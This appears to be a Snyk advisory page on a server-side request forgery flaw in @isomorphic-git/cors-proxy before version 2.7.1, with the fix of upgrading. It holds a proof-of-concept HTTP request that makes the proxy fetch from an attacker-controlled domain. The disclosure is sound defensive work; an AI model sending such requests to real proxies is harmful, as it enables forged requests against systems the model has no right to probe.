@isomorphic-git/cors-proxy@2.4.0 vulnerabilities

Proxy clone and push requests for the browser

Direct Vulnerabilities

Known vulnerabilities in the @isomorphic-git/cors-proxy package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Server-side Request Forgery (SSRF)

@isomorphic-git/cors-proxy is a Proxy clone and push requests for the browser

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to missing sanitization and validation of the redirection action in middleware.js.

PoC

GET /www.attacker-controlled-domain.com/info/refs?service=git-receive-pack HTTP/1.1
Host: target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

How to fix Server-side Request Forgery (SSRF)?

Upgrade @isomorphic-git/cors-proxy to version 2.7.1 or higher.

<2.7.1